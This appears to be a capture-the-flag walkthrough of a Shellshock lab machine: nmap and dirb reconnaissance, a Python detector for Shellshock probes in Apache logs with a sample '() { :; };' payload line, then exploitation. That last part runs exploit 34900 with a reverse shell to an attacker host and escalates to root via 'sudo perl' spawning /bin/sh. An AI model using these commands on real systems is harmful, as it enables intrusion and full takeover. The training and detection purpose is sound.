[Reconnaissance]
1. Port scan
nmap -Pn <ip>
2. Scan for everything on the open ports
nmap -A -p 80,2222 <ip>
3. Vulnerability scan
nmap --script vuln -p 80,2222 <ip>
4. Try to log in with ssh
ssh <ip> -p 2222
5. Directory fuzzing
dirb http://<ip>
6. Scan /cgi-bin/ for shell scripts
dirb http://<ip>/cgi-bin/ -X .sh
This turned up a .sh script under /cgi-bin/, which could mean Shellshock.
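What the defender sees: a Shellshock probe against a script like the one found in /cgi-bin/ arrives as a request header whose value starts with a bash function definition, which the CGI handler copies into an environment variable. The detection below over Apache combined-format access log lines is an added example, not part of the original walkthrough; the log lines are constructed.

```python
import re

# Shellshock smuggles a bash function definition into an environment
# variable that CGI builds from request headers. The telltale is "() {"
# at the start of a header value, with optional whitespace.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache combined log format: ... "REQUEST" status size "REFERER" "USER-AGENT"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def is_shellshock_probe(value):
    """True if a header value carries the bash function-definition marker."""
    return SHELLSHOCK_RE.search(value) is not None


def find_shellshock_in_access_log(lines):
    """Return (ip, request, header_value) for every suspicious log line.

    Referer and User-Agent are the header fields the combined format keeps,
    and both become CGI environment variables (HTTP_REFERER, HTTP_USER_AGENT).
    """
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("ua", "referer"):
            if is_shellshock_probe(m.group(field)):
                hits.append((m.group("ip"), m.group("req"), m.group(field)))
                break
    return hits


# Constructed sample lines (not from any real server): an ordinary request,
# a Shellshock-style probe against the CGI script, and a benign "{" in a UA.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2024:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2024:12:00:07 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 88 "-" "() { :; }; echo probe"',
    '10.0.0.7 - - [10/Oct/2024:12:00:09 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "MyBot/1.0 {json}"',
]

if __name__ == "__main__":
    for ip, req, val in find_shellshock_in_access_log(SAMPLE_LOG):
        print(f"ALERT {ip} {req!r} header={val!r}")
```

Feeding the real access log through the same function (one line per list element) flags the probe by source address and request path, and the CGI script itself should also be removed or bash patched so the header never reaches a vulnerable interpreter.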
[Exploitation]
1. Search for exploits
searchsploit shellshock cgi
2. Copy script no. 34900 into the current directory
searchsploit -m 34900
3. Read the script for usage
4. Run the script
python 34900.py payload=reverse rhost=<target ip> lhost=<attacker ip> lport=1235 pages=/cgi-bin/user.sh
Success!!!
5. Verify user
whoami
Seems like I have shelly's privileges.
6. Read user.txt
cd /home/shelly
cat user.txt
7. Privilege escalation
Verify sudo privileges
sudo -l
I can "sudo perl".
Use the command from this site: https://gtfobins.github.io/gtfobins/perl/#sudo
sudo perl -e 'exec "/bin/sh";'
whoami
Now I'm root.
8. Read root.txt
cd /root
cat root.txt